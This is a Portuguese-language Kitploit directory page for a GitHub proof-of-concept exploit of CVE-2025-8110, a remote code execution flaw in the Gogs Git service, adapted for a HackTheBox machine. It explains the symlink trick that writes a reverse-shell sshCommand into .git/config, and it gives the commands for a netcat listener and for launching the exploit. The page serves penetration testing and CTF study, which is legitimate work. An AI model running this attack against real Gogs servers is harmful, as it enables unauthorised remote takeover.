Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8110 — Exploit do serviço Gogs e obtenha o usuário root | Kitploit
Ferramentas/GitHubGitHub/ixzodiak/cve-2025-8110
ExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

Exploit do serviço Gogs e obtenha o usuário root

Ver Repositório
49há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

Aviso legal: Esta ferramenta destina-se estritamente a fins educacionais e a testes de penetração autorizados. Use-a apenas contra sistemas para os quais você tenha permissão explícita de teste.


Esta é uma versão modificada de zAbuQasem/gogs-CVE-2025-8110, adaptada para funcionar contra a máquina Silentium no HackTheBox. O PoC original exigiu ajustes para lidar com a configuração específica do Gogs e o fluxo de autenticação da Silentium.


A vulnerabilidade

CVE-2025-8110 é uma vulnerabilidade de Execução Remota de Código no Gogs, um serviço Git auto-hospedado.

O endpoint da API de atualização de arquivos do Gogs (PUT /api/v1/repos/.../contents/<file>) não valida se o arquivo alvo é um symlink. Um atacante autenticado pode enviar um symlink para um repositório que aponte para .git/config e, em seguida, usar a API para sobrescrevê-lo com uma carga maliciosa. A carga injeta um sshCommand personalizado no git config, que o Gogs executa no servidor na próxima vez que realizar uma operação SSH nesse repositório, resultando em execução remota de código.


O que o PoC faz

  1. Autentica no Gogs e extrai um token CSRF da página de login.
Baixar ferramenta
  • Gera um token da API do Gogs por meio da página de configurações do usuário.
  • Cria um novo repositório via API com SSH habilitado.
  • Clona o repositório localmente, insere um symlink (malicious_link -> .git/config) e faz push.
  • Chama a API de atualização de arquivo no symlink, gravando um .git/config malicioso que contém sshCommand = <reverse shell>.
  • O Gogs segue o symlink e sobrescreve seu próprio .git/config, acionando o shell na próxima operação SSH.

  • Uso

    Instalar dependências:

    root@kitploit:~
    pip install -r requirements.txt
    

    Iniciar um listener:

    root@kitploit:~
    nc -lvnp <PORT>
    

    Executar o exploit:

    root@kitploit:~
    python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
    

    Opcional — rotear pelo Burp Suite:

    root@kitploit:~
    python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
    
    FlagDescrição
    -uURL base do Gogs
    -lhSeu IP de atacante (host do shell reverso)
    -lpSua porta do listener
    -unSeu nome de usuário registrado no Gogs
    -pwSua senha do Gogs
    -x(Opcional) Roteie o tráfego pelo Burp em localhost:8080